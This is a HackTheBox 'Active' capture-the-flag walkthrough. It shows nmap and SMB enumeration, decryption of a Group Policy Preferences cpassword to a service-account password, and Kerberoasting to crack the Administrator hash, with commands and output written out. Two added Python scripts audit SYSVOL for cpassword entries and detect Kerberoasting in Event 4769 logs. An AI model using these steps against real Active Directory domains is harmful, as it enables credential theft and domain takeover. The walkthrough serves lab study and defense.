HackTheBox Active
❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.10.100 -oG port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-21 11:37 EDT
Initiating SYN Stealth Scan at 11:37
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
49152/tcp open unknown syn-ack ttl 127
49153/tcp open unknown syn-ack ttl 127
49154/tcp open unknown syn-ack ttl 127
49155/tcp open unknown syn-ack ttl 127
49157/tcp open unknown syn-ack ttl 127
49158/tcp open unknown syn-ack ttl 127
49165/tcp open unknown syn-ack ttl 127
Next we run a more detailed scan against the open ports of the Active machine.
❯ nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,49152,49153,49154,49155,49157,49158,49165 10.10.10.100 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-21 11:39 EDT
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 11:40 (0:00:18 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-21 10:10:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: -5h29m28s
| smb2-time:
| date: 2025-04-21T10:11:17
|_ start_date: 2025-04-20T17:58:41
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.92 seconds
We use Nmap (default scripts and version detection) to try to identify service versions and possible vulnerabilities on the open ports we found.
ldapsearch
❯ ldapsearch -x -H ldap://10.10.10.100 -s base | grep defaultNamingContext
defaultNamingContext: DC=active,DC=htb
❯ ldapsearch -x -H ldap://10.10.10.100 -s base | grep ldapServiceName
ldapServiceName: active.htb:dc$@ACTIVE.HTB
We confirm the domain name.
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.100 active.htb
We add the domain to /etc/hosts.
❯ enum4linux -a -u "" -p "" 10.10.10.100
[+] Attempting to map shares on 10.10.10.100
//10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/A
We see that the Replication share can be accessed anonymously.
❯ smbclient //10.10.10.100/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \>
We connect, enable recursive mode, and download everything we find.
❯ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
❯ pwd
/home/kali/Desktop/HackTheBox/Active/content/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
Among the downloaded files we find an .xml file belonging to a Group Policy that contains information about an Active Directory user. The file includes a field called cpassword, which is encrypted with a known key that is part of the default configuration of Windows Group Policy Preferences (GPP).
❯ impacket-Get-GPPPassword -xmlfile Groups.xml 'LOCAL'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Found a Groups XML file:
[*] file : Groups.xml
[*] newName :
[*] userName : active.htb\SVC_TGS
[*] password : GPPstillStandingStrong2k18
[*] changed : 2018-07-18 20:46:06
❯ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
To decrypt this value we can use tools such as gpp-decrypt or impacket-Get-GPPPassword.
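As an added example, not part of the original write-up or of any of the tools named above, here is a small Python audit of the defender's side of this finding: it walks a SYSVOL-style tree, picks out the Group Policy Preferences XML files whose schema carries a cpassword attribute, and reports each stored credential together with the account it belongs to. It does not decrypt anything: the presence of the attribute is the finding, because MS14-025 only stopped new cpassword entries from being created and left existing ones in SYSVOL. The first sample is the Groups.xml shown above; the list of GPP file names, the account-name attributes used by the other item types, the directory layout with a placeholder GUID and the second "clean" Groups.xml are my assumptions.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# The Groups.xml recovered from the Replication share above, embedded so the
# audit runs offline (constructed copy of the page's listing).
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""

# Constructed Groups.xml that stores no password, to show the clean case.
SAMPLE_CLEAN_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup Operators" image="2" changed="2019-01-01 00:00:00"><Properties action="U" newName="" description="" userName="Backup Operators"/></User></Groups>"""

# GPP item files whose schema includes a cpassword attribute (assumed list).
GPP_FILE_NAMES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
                  "DataSources.xml", "Drives.xml", "Printers.xml"}
# The attribute naming the account differs per item type (assumed set).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def extract_cpassword_entries(xml_text: str, source: str = "<inline>") -> list[dict]:
    """Return one audit record per element carrying a non-empty cpassword."""
    root = ET.fromstring(xml_text)
    # ElementTree has no parent pointers, so build the map once.
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        blob = elem.attrib.get("cpassword", "")
        if not blob:
            continue
        item = parents.get(elem, elem)  # the User/NTService/Task/... element
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if elem.attrib.get(a)),
                       item.attrib.get("name", "?"))
        findings.append({
            "file": source,
            "item": item.tag,
            "account": account,
            "changed": item.attrib.get("changed", ""),
            "cpassword_len": len(blob),
        })
    return findings


def scan_sysvol(root_dir: Path) -> list[dict]:
    """Walk a SYSVOL (or a downloaded copy) and collect cpassword findings."""
    findings = []
    for path in sorted(root_dir.rglob("*.xml")):
        if path.name not in GPP_FILE_NAMES:
            continue
        try:
            # utf-8-sig tolerates the BOM that GPP files often carry.
            text = path.read_text(encoding="utf-8-sig")
            findings.extend(extract_cpassword_entries(text, str(path)))
        except ET.ParseError as exc:
            findings.append({"file": str(path), "item": "PARSE_ERROR",
                             "account": str(exc), "changed": "", "cpassword_len": 0})
    return findings


def demo() -> list[dict]:
    """Lay the samples out in the SYSVOL-style tree seen on the share and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        policies = Path(tmp) / "Policies"
        hit = policies / "{31B2F340-016D-11D2-945F-00C04FB984F9}" / "MACHINE" / "Preferences" / "Groups"
        hit.mkdir(parents=True)
        (hit / "Groups.xml").write_text(SAMPLE_GROUPS_XML, encoding="utf-8")
        clean = policies / "{PLACEHOLDER-GUID}" / "MACHINE" / "Preferences" / "Groups"
        clean.mkdir(parents=True)
        (clean / "Groups.xml").write_text(SAMPLE_CLEAN_XML, encoding="utf-8")
        return scan_sysvol(Path(tmp))


if __name__ == "__main__":
    for f in demo():
        print(f"[!] {f['file']}: {f['item']} {f['account']} (changed {f['changed']}, "
              f"cpassword {f['cpassword_len']} chars)")
```

Point scan_sysvol at a mounted SYSVOL or at a directory like the one downloaded above; every record it returns is a credential that should be removed from the policy and rotated.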
❯ nxc smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ
❯ nxc smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --users
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.100 445 DC Administrator 2018-07-18 19:06:40 0 Built-in account for administering the computer/domain
SMB 10.10.10.100 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.100 445 DC krbtgt 2018-07-18 18:50:36 0 Key Distribution Center Service Account
SMB 10.10.10.100 445 DC SVC_TGS 2018-07-18 20:14:38 0
SMB 10.10.10.100 445 DC [*] Enumerated 4 local users: ACTIVE
With these credentials we enumerate shares and active users.
❯ smbclient //10.10.10.100/Users -U active.htb/SVC_TGS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
5217023 blocks of size 4096. 266824 blocks available
smb: \> cd SVC_TGS/Desktop
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Sun Apr 20 13:59:50 2025
5217023 blocks of size 4096. 266824 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
We connect to the Users share and retrieve the first flag, user.txt.
Privilege Escalation
❯ impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
We carry out a Kerberoasting attack to identify services in the active.htb domain that are associated with user accounts. This attack lets us request Kerberos service tickets (TGS) for those services, which can then be cracked offline to recover the cleartext passwords of the linked accounts. As a result, we obtain a Kerberos hash (KRB5-TGS) for the Administrator account.
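As an added example, not from the original write-up, here is the detection side of the step above in Python, run over constructed Windows Security Event ID 4769 (Kerberos service ticket request) records. Kerberoasting leaves successful service-ticket requests with RC4 encryption (TicketEncryptionType 0x17) for services that run under user accounts rather than computer accounts, typically several in quick succession from one requester, because cracking tools ask for RC4 tickets explicitly. The field names are those of the real 4769 EventData; the events, the requester IP addresses and the svc_sql service are constructed, and the two-distinct-services threshold is my choice, not a Microsoft default.

```python
from collections import defaultdict
from datetime import datetime

# RC4-HMAC (0x17) and RC4-HMAC-EXP (0x18): the ticket types that crack fastest
# offline, so roasting tooling requests them explicitly.
RC4_ETYPES = {"0x17", "0x18"}

# Constructed 4769 records (EventData field names as logged by the DC). One
# requester pulls RC4 tickets for two user-account SPNs; the rest is normal.
SAMPLE_4769_EVENTS = [
    {"time": "2025-04-21T10:11:00Z", "TargetUserName": "DC$@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0",
     "IpAddress": "::ffff:10.10.10.100"},
    {"time": "2025-04-21T10:11:05Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "Status": "0x0",
     "IpAddress": "::ffff:10.10.14.5"},
    {"time": "2025-04-21T10:12:10Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.14.5"},
    {"time": "2025-04-21T10:12:11Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "::ffff:10.10.14.5"},
    {"time": "2025-04-21T10:15:00Z", "TargetUserName": "Administrator@ACTIVE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "Status": "0x0",
     "IpAddress": "::ffff:10.10.10.100"},
]


def _ts(value: str) -> datetime:
    # fromisoformat only accepts the trailing "Z" on Python 3.11+, so normalise it.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def is_roast_candidate(event: dict) -> bool:
    """A successful RC4 service-ticket request for a service run by a user account."""
    service = event["ServiceName"]
    return (
        event["TicketEncryptionType"].lower() in RC4_ETYPES
        and event["Status"] == "0x0"
        and not service.endswith("$")      # computer accounts: long random passwords
        and service.lower() != "krbtgt"    # TGT traffic is logged with ServiceName krbtgt
    )


def detect_kerberoast(events, min_distinct_services: int = 2) -> dict:
    """Group candidate requests by requesting principal; alert on those that asked
    for at least min_distinct_services different services."""
    by_requester = defaultdict(lambda: {"services": set(), "sources": set(),
                                        "first": None, "last": None})
    for ev in events:
        if not is_roast_candidate(ev):
            continue
        rec = by_requester[ev["TargetUserName"]]
        rec["services"].add(ev["ServiceName"])
        rec["sources"].add(ev["IpAddress"])
        t = _ts(ev["time"])
        rec["first"] = t if rec["first"] is None or t < rec["first"] else rec["first"]
        rec["last"] = t if rec["last"] is None or t > rec["last"] else rec["last"]

    alerts = {}
    for requester, rec in by_requester.items():
        if len(rec["services"]) >= min_distinct_services:
            alerts[requester] = {
                "services": sorted(rec["services"]),
                "sources": sorted(rec["sources"]),
                "span_seconds": (rec["last"] - rec["first"]).total_seconds(),
            }
    return alerts


if __name__ == "__main__":
    for who, info in detect_kerberoast(SAMPLE_4769_EVENTS).items():
        print(f"[!] {who} requested RC4 service tickets for {info['services']} "
              f"from {info['sources']} within {info['span_seconds']:.0f}s")
```

In a domain where RC4 is still widely negotiated, raise min_distinct_services and baseline each requester; the lasting fix is to enforce AES on service accounts and keep SPNs off highly privileged accounts such as Administrator, which is exactly what made this step work here.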
We save the hash we obtained.
We crack it and obtain the Administrator password.
And the machine is solved.